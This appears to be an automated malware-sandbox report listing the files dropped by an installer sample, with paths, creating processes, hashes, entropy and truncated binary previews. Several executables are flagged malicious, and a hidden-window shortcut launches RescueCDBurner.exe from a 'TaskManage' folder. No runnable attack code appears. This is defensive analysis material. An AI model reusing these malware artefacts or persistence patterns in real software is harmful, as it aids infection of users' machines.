Preview:	.PNG........IHDR...2...2......?......gAMA......a.....pHYs...........k.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>..<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:tiff="http://ns.adobe.com/tiff/1.0/"><tiff:Orientation>1</tiff:Orientation></rdf:Description></rdf:RDF></x:xmpmeta>..<?xpacket end='w'?>,.......IDAThC.Io#Iz.....L&W.Z(j.*U..l_.Kl.a``......0.1...G.?a.d.in...x..J..E...L.1.Lj+..U.....Tf,o..E\|oD......-.]S.-Tb.a..A...M.;..M.ea..!.X.n......?..<0....4IU.$......h..fh.8M. <..#f?../.J.U.(W.........aq?.....T.q....N4w.b.7?....84[{-v..R..... .Cd-Rw....o{.....K"q....!\^.v/..`........;;O..'..sA....`..D.V..". .......\.D...( .`>......N...e[L..O....=2.>}...}..P....#".....,...w.w.H>"A..>t.Q....O._....M.........R.5....oO........$.......^.gm..X6XV.<.}!H4.z.m...PJ}...F.XNM.P.i6+\|.U...8..B\|? .#.4}...#M

C:\Users\user\AppData\Local\Temp\4233027f-f150-4259-8f19-b516f9ed5479.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\6922fff6-9733-459b-8b7d-92561e5b70df.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\7b70ddc3-34fc-47e2-bab9-7dc6f4acde45.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
Category:	dropped
Size (bytes):	76326
Entropy (8bit):	7.9961120748813075
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
MD5:	01E352D35675990A139199DD86B38AAC
SHA1:	E16163C81E5F36B3B819AA0A63BFA63D88548A91
SHA-256:	148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
SHA-512:	75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\805c342e-975c-4e92-a609-954c9ce389dc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\8f80e89d-1f10-4ed6-b2cb-8210372072df.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	32970
Entropy (8bit):	7.716656399542583
Encrypted:	false
SSDEEP:	768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty2g:5WcDWyRKNVd2M/IxMuYEDlymsTQ2g
MD5:	AF94F056D7C061FC77B52EC3E9989971
SHA1:	7B146019C2C1E496638AD585FA9EA20690736998
SHA-256:	B366EE00FEF329D471BA224261968CA9C7F3B916F8C6E044FA7154F071527644
SHA-512:	4A5DB9349504BE07A4501C003E8ABDFE497EF7996AB77BABAE88BE93B1F3B7CE7B6979CFA1355CCC6424541BCD200EABD3465CDE4A0782A5ACB9F39CDB141BE3
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\Hebephrenia_20250109084134.log

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	987
Entropy (8bit):	5.447981523133411
Encrypted:	false
SSDEEP:	24:fXZbAIeLLzjXUhXhcP21XhcP2hXfcP2t6j5XfcP2sBXfcP23hv:fX5xYjXmXAwXAgXSK6NXSlBXSOv
MD5:	72D8C645403762FD34858BA7B9A5D17E
SHA1:	18EA197FC872D8BC0BF70F415FA2F25CF2F326A3
SHA-256:	AF2202A3BD13874DC008512760E9966069DD3F3068F26420BC0D8571F12CBC4D
SHA-512:	AFDA51126AC1C5CB342788D3DAC0BD7387FFA7385FB0F3BE66AD984F5526CC3ABD83BB4D0B25C165B0758DE34EF28E9B90318D19780E4D25CE4D853358BC148B
Malicious:	false
Preview:	[1CDC:1CD8][2025-01-09T08:41:32]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe..[1CDC:1CD8][2025-01-09T08:41:32]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\24EPV9vjc5.exe -burn.filehandle.attached=532 -burn.filehandle.self=520'..[1CDC:1CD8][2025-01-09T08:41:32]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\24EPV9vjc5.exe'..[1CDC:1CD8][2025-01-09T08:41:32]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1CDC:1CD8][2025-01-09T08:41:34]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250109084134.log'..[1CDC:1CD8][2025-01-09T08:41:34]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'..[1CDC:1CD8][2025-01-09T08:41:34]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'..

C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: cLm7ThwEvh.msi, Detection: malicious, Browse Filename: LVkAi4PBv6.exe, Detection: malicious, Browse Filename: w3245.exe, Detection: malicious, Browse Filename: w3245.exe, Detection: malicious, Browse Filename: 9mauyKC3JW.exe, Detection: malicious, Browse Filename: ATLEQQXO.exe, Detection: malicious, Browse Filename: ATLEQQXO.exe, Detection: malicious, Browse Filename: upgrade.hta, Detection: malicious, Browse Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse Filename: UolJwovI8c.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b9ef1382

Download File

Process:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	5698949
Entropy (8bit):	7.749294828387505
Encrypted:	false
SSDEEP:	98304:VEIZkYz4n9YaLm5jJl3eHvBLG3Hi3JlHcbGW20wlOiKXdeGFShUsmNvJqTsRP7mA:yYz4n6aLm5jJl3eHJLKi3JFia5Ql+T4X
MD5:	E230790CCDAA29C9E8C14F0FBCAA363E
SHA1:	8FC115ABFBB205530E16F2215E30246A2181957F
SHA-256:	6908B57C56C0789A689831E853DA17DC2467531E167B44B552F7ED5C0EEAF101
SHA-512:	37BEF0C61911C3CBA54AC0FD1D84C7CEE19CB4C644EBF07A8B3A3C60A8BBCA77480E56A78AC67EF964986DAE3568DB48BF556B65300E2F11D93CBB2C8E00AD25
Malicious:	false
Preview:	..Ol..Ol..Ol..Ol..Ol1.Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Nl0..<Q..-0...v. .z.;0B.!.z.<0F...a...{..<g.(.t.<0F...a.?l..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..OlV...\|.&.y.5.P.Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..OlV...p.;.\.<.t.,...Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol0.."Q..II.&.g.<.s.a"P..*g.".b.=...Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Olc.a\;..['.Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol

C:\Users\user\AppData\Local\Temp\cdglerhptqr

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 9 12:41:35 2025, mtime=Thu Jan 9 12:41:36 2025, atime=Fri Jan 3 17:35:24 2025, length=6487736, window=hide
Category:	dropped
Size (bytes):	927
Entropy (8bit):	4.989379153231198
Encrypted:	false
SSDEEP:	12:8zMCw4sRtSkChVY//N6GfLGNAKnc6OObHwD/0jAyiuHky5uUkRUJ6bwD/pGlrmV:8zB8BTKnxB0gAyihRUUopGlrm
MD5:	E259B34B63BFB8DE3006EE26273A7537
SHA1:	800B6046C5BB60B4D9B92473A31C964FCFCE288B
SHA-256:	8EF1C2808C876E06FF47EC63C307FF64E880C33F4A28AB17E0C1D865D8434F1B
SHA-512:	6987D27A67423911A041A99B591A77F3E16C44083244DE3F081BEDFC007BC48236569FBCA0047B737D896F37EB7174C145C56854B7FF96C0F35E0A4C2F873415
Malicious:	false
Preview:	L..................F.... ...M..3.b...N.4.b....]@.^....b.......................:..DG..Yr?.D..U..k0.&...&.......y.Yd.....(..b...P~:.b......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B)Z-m..........................d...A.p.p.D.a.t.a...B.V.1.....)Z2m..Roaming.@......EW)B)Z3m...........................Vv.R.o.a.m.i.n.g.....^.1.....)Z2m..TASKMA~1..F......)Z2m)Z3m....d(........................T.a.s.k.M.a.n.a.g.e.....r.2...b.#Zl. .RESCUE~1.EXE..V......)Z2m)Z2m.....)........................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......l...............-.......k.............l......C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.a.s.k.M.a.n.a.g.e.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......301389...........hT..CrF.f4... .}W..Yc...,...E...hT..CrF.f4... .}W..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\cooisyadg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2602496
Entropy (8bit):	6.716476069650749
Encrypted:	false
SSDEEP:	49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
MD5:	55CA99F0DC9854368750B8886DC455FC
SHA1:	A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
SHA-256:	08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
SHA-512:	D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.3972734500570905
Encrypted:	false
SSDEEP:	24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0Zpvv5pmeO02O5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0Zc
MD5:	610ECC04318C0C3C73E406D9EB0A28A4
SHA1:	FE2676A81DEA24A05F9983AE676CEA6373925567
SHA-256:	CE43F92C02DA9BE0AAD114384D0E8A33D04CD0027AD50EE8BB2820297183852B
SHA-512:	C295B488AD708DCCB7F56754A3649FD078508EE17DA98FA3CBA01017F5A45752D3F83F4F507F6FBE3849CA1F7734D3A7F32960BC439F8D2F7AC2B272F9C1CD5D
Malicious:	false
Preview:	{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442

C:\Users\user\AppData\Local\Temp\d0a10e2b

Download File

Process:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	5698949
Entropy (8bit):	7.749294504492343
Encrypted:	false
SSDEEP:	98304:qEIZkYz4n9YaLm5jJl3eHvBLG3Hi3JlHcbGW20wlOiKXdeGFShUsmNvJqTsRP7mA:5Yz4n6aLm5jJl3eHJLKi3JFia5Ql+T4X
MD5:	1F79586B3945D48D7FA16F85B691B392
SHA1:	D26FB925803D2CAD3FC0B635000B14D6F8F53AEC
SHA-256:	E16DEF4D3829EF7A1D7B0CF149E40EFF7AF4569AB450BD35D21160650D466FD1
SHA-512:	40CF578CE902E62EF6338B1B4B614CD5008F6E57AC2355BDC7283F6820043DF923796B8D49F8A2B6984479DAD3E87511083F9A58BCAEB2A6F401A79586C39198
Malicious:	false
Preview:	..Ol..Ol..Ol..Ol..Ol1.Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Nl0..<Q..-0...v. .z.;0B.!.z.<0F...a...{..<g.(.t.<0F...a.?l..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..OlV...\|.&.y.5.P.Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..OlV...p.;.\.<.t.,...Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol0.."Q..II.&.g.<.s.a"P..*g.".b.=...Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Olc.a\;..['.Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol..Ol

C:\Users\user\AppData\Local\Temp\fffwkwbrsb

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2602496
Entropy (8bit):	6.716476069650749
Encrypted:	false
SSDEEP:	49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
MD5:	55CA99F0DC9854368750B8886DC455FC
SHA1:	A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
SHA-256:	08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
SHA-512:	D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\scoped_dir6592_1346790632\805c342e-975c-4e92-a609-954c9ce389dc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir6592_1346790632\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
